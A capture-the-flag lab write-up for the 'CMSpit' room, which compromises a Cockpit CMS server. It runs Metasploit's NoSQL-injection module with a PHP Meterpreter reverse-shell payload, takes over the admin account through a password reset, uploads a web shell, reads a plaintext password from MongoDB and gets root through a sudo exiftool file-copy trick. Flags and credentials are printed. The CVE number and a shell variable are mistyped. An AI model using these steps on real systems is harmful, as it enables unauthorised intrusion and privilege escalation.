# CMSpit
You've identified that the CMS installed on the web server has several vulnerabilities that allow attackers to enumerate users and change account passwords.

Your mission is to exploit these vulnerabilities and compromise the web server.

# Tasks
* Name of CMS
* Version of CMS
* Path that allows user enum.
* Numbers of users during enum.
* Path that allows change of password.
* Compromise CMS, Get email of Skidy.
* Web flag
* DB flag
* user flag
* CVE for binary
* utility used for POC file
* root.txt
# Vulnerabilities
* Injection
* CVE-2021-2022204

# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
|_  256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Looking at the login page, it says "Cockpit". That's probably the CMS they're using.
Doing some research on the CMS it looks like version 0.10.0 and 0.11.0 is vulnerable to a lot of exploits. So it might be one of those two.

We can try navigating to robots.txt but it will just bring us to to the login page so not much we can do

This article looked very interesting to us since it goes from NoSQLI to RCE
https://www.rapid7.com/db/modules/exploit/multi/http/cockpit_cms_rce/

And it's using metasploit too so might be easy.

# METASPLOIT

```txt
Module options (exploit/multi/http/cockpit_cms_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ENUM_USERS  true             no        Enumerate users
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The URI of Cockpit
   USER                         no        User account to take over
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.17.1.163      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

```
The exploit went through and we get this.
```bash
[*] Attempting Username Enumeration (CVE-2020-35846)
[+]   Found users: ["admin", "darkStar7471", "skidy", "ekoparty"]
[-] Exploit aborted due to failure: bad-config: 10.10.126.142:80 - User to exploit required
```
If you're interested about how it works take a look at these:
* https://packetstormsecurity.com/files/162282/Cockpit-CMS-0.11.1-NoSQL-Injection-Remote-Command-Execution.html
* https://portswigger.net/daily-swig/cockpit-cms-flaws-exposed-web-servers-to-nosql-injection-exploits

Now let's try exploiting it with user skidy since we want his email.
```txt
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"]
[*] Checking token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*] Obtaining user info
[*]   user: admin
[*]   name: Admin
[*]   email: admin@yourdomain.de
[*]   active: true
[*]   group: admin
[*]   password: $2y$10$dChrF2KNbWuib/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq
[*]   i18n: en
[*]   _created: 1621655201
[*]   _modified: 1621655201
[*]   _id: 60a87ea165343539ee000300
[*]   _reset_token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*]   md5email: a11eea8bf873a483db461bb169beccec
[-] Exploit aborted due to failure: unexpected-reply: 10.10.126.142:80 - Unable to get valid password reset token for user. Double check user
[*] Exploit completed, but no session was created.
```
That doesn't look the email that we want.
Let's try set it to user admin.
```txt
[*] Obtaining reset tokens (CVE-2020-35847)
[+]   Found tokens: ["rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"]
[*] Checking token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*] Obtaining user info
[*]   user: admin
[*]   name: Admin
[*]   email: admin@yourdomain.de
[*]   active: true
[*]   group: admin
[*]   password: $2y$10$dChrF2KNbWuib/5lW1ePiegKYSxHeqWwrVC.FN5kyqhIsIdbtnOjq
[*]   i18n: en
[*]   _created: 1621655201
[*]   _modified: 1621655201
[*]   _id: 60a87ea165343539ee000300
[*]   _reset_token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*]   md5email: a11eea8bf873a483db461bb169beccec
[+] Changing password to 9ATmTELXox
[+] Password update successful
[*] Attempting login
[-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[*] Exploit completed, but no session was created.
```
Looks like it changed the password for user admin. Let's try to login.
Sweet we're in!
Now let's head to accounts and see the email for Skidy.
Now to hunt for the flag, head to the finder and there should be a webflag.php file
```php
<?php
        $flag = "thm{f158bea70731c48b05657a02aaf955626d78e9fb}";
?>
```
Since we can upload a file maybe we can upload a reverse shell?
I'll upload a web shell so that I'm able to invoke commands as I want.
And it went through!
Let's get a reverse shell.

# Privesc
Now we need to get the web flag. I haven't done any MongoDB so let's try and see what we can do.

We can run Mongo on the box. Let's search how to list databases.
```mongo
> show dbs
admin         (empty)
local         0.078GB
sudousersbak  0.078GB
```
Okay how do I use it.
```mongo
> use sudousersbak
switched to db sudousersbak
```
How do I list the tables?
```mongo
> show collections
```
Be noted that I'm only using google to guide me.(xd)
Show tables also work.
Now how do I list out the contents of the table.
```mongo
> db.collectionName.find()
{ "_id" : ObjectId("60a89f3aaadffb0ea68915fb"), "name" : "thm{c3d1af8da23926a30b0c8f4d6ab71bf851754568}" }
```
There's our flag!
Now we're not done yet with the Database we still need to get a password to escalate our privileges.
We saw a users table, maybe there's something in there.
```mongo
> db.user.find()
{ "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "p4ssw0rdhack3d!123" }
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }
```
Now let's try to get user stux.
```bash
$ su stux
stux@ubuntu:~$ cat user.txt
```
Now we just need to root this box.
```bash
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool
```
That's weird, exiftool? Let's search that up for a CVE.
Looks like there's a recent CVE, CVE-2021-22204
https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/

Looks like it's using djvumake to create the POC file.
Now since we have sudo privileges on exiftool, let's check out gtf0bins

**If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.**
```bash
LFILE=file_to_write
INPUT=input_file
sudo exiftool -filename=$LFIFE $INPUT
```
Let's grab root.txt using this.
```bash
LFILE=/tmp/lol
INPUT=/root/root.txt
sudo exiftool -filename=$LFIFE $INPUT
```
And now we can output lol for the flag.

This was a very fun room!


